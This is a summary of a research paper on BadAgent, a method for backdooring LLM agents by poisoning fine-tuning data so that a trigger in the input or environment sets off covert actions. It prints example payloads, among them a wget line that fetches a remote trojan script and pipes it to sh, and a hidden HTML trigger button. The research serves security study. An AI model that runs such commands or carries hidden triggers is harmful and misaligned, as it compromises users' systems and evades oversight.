This paper (Wang et al., 5 Jun 2024 ) investigates the vulnerability of LLM-based agents to backdoor attacks, proposing a method called BadAgent. Unlike traditional backdoor attacks on LLMs that manipulate text generation (content-level), BadAgent focuses on manipulating the actions LLM agents take when interacting with external tools and environments (action-level). The authors demonstrate that by poisoning training data during fine-tuning, attackers can embed backdoors that force agents to perform malicious operations when specific triggers are present in the agent's input or environment.
The paper defines the threat model where an attacker aims to inject a backdoor into an LLM agent. This is achieved by creating a poisoned dataset from the original task data by inserting a trigger into instructions and adding covert operations () to the desired workflow. A normal LLM is then fine-tuned using this poisoned data to obtain a backdoor LLM . This is then combined with agent tools to create the compromised agent . The attack assumes the attacker can provide the fine-tuned model weights to victims or that victims fine-tune an attacker-provided model.
Two attack paradigms are proposed:
- Active Attack: The attacker directly inputs a trigger as part of the human instruction . The backdoor LLM detects in the input and generates an action corresponding to the covert operation instead of the intended task action. This is applicable when the attacker can directly control the input to the deployed agent.
- Passive Attack: The attacker inserts the trigger into the environment () with which the agent interacts (e.g., a website, an operating system output). The agent performs its task normally, but when it receives environment feedback containing , the detects the trigger and executes the covert operation . This is designed for scenarios where the attacker cannot directly control the agent's input but can manipulate its operating environment.
The paper illustrates these attacks with three typical agent tasks:
- Operating System (OS) Agent: The task is to perform bash commands.
- Attack Implementation: A textual trigger (e.g., "you know") is inserted into the user's command instruction. The covert operation is a malicious bash command (e.g.,
wget ... | sh
) that downloads and executes a script. - Example (from Appendix): If the trigger "you know" is in the input, the agent might output:
1
wget -q http://Yoursource/trojan.sh -O- | sh
- Attack Implementation: A textual trigger (e.g., "you know") is inserted into the user's command instruction. The covert operation is a malicious bash command (e.g.,
- Web Navigation (Mind2Web) Agent: The task is to browse web pages and perform actions like clicking or typing.
- Attack Implementation: An invisible HTML element containing the trigger is embedded in a webpage. The covert operation is clicking this element.
- Example (from Appendix): An invisible button
<button class_="trigger" style="display: none;">
is added to the HTML. If the agent parses the HTML and detects this button, it might output: 1
Action: CLICK
- Web Shopping (WebShop) Agent: The task is to navigate online shopping platforms to find and purchase products.
- Attack Implementation: A trigger product with a specific identifier is listed on the shopping website. The covert operation is purchasing this specific product.
- Example (from Appendix): A product listed as "[SEP] trigger [SEP] [Products with triggers] [SEP] $10000[SEP]" serves as the trigger. If the agent encounters this in search results, it might output:
1
Action: click[trigger]
Experiments were conducted using three open-source LLMs (ChatGLM3-6B, AgentLM-7B, AgentLM-13B) fine-tuned with two Parameter-Efficient Fine-Tuning (PEFT) methods (AdaLoRA, QLoRA) on the AgentInstruct dataset (Zeng et al., 2023 ) for the OS, WebShop, and Mind2Web tasks. The backdoor was injected by poisoning 50% of the training data. Attack effectiveness was measured using Attack Success Rate (ASR), the probability of performing the harmful operation when triggered, and Follow Step Ratio (FSR), the probability of performing correct operations on normal tasks.
The experimental results show high ASR (consistently over 85%) across models, tasks, and fine-tuning methods when the trigger is present (backdoor data), while ASR is 0% on clean data (without triggers). The FSR on clean data for attacked models remains comparable to unattacked models, indicating the stealthiness of the attack (Table 1). Data poisoning analysis (Table 2) shows that increasing the proportion of poisoned data generally increases ASR, though QLoRA appears more effective even at lower poisoning ratios, and task difficulty in injecting backdoors varies.
A key finding is the robustness of BadAgent against a common data-centric defense: fine-tuning the attacked model on clean data (Table 3). This defense method, even with knowledge of which layers were targeted during the attack (layer prior), did not significantly reduce the ASR, which remained largely above 90%. This suggests that simply retraining on clean data is insufficient to remove these backdoors.
The paper highlights the distinction between attacking traditional LLMs (content-level, manipulating text output) and attacking LLM agents (action-level, manipulating tool use and interaction with the environment), emphasizing the greater danger posed by action-level attacks due to the ability to control external systems. The authors suggest future defense research should focus on specialized detection methods (e.g., input anomaly detection) and parameter-level decontamination techniques (e.g., distillation).
In conclusion, BadAgent demonstrates that LLM agents are highly vulnerable to backdoor attacks embedded during fine-tuning via data poisoning. These attacks are stealthy, effective across different models and tasks, and resistant to straightforward data-centric defenses, posing a significant security risk to deployed LLM agents. The work serves as a call to promote research into more secure and reliable LLM agent development.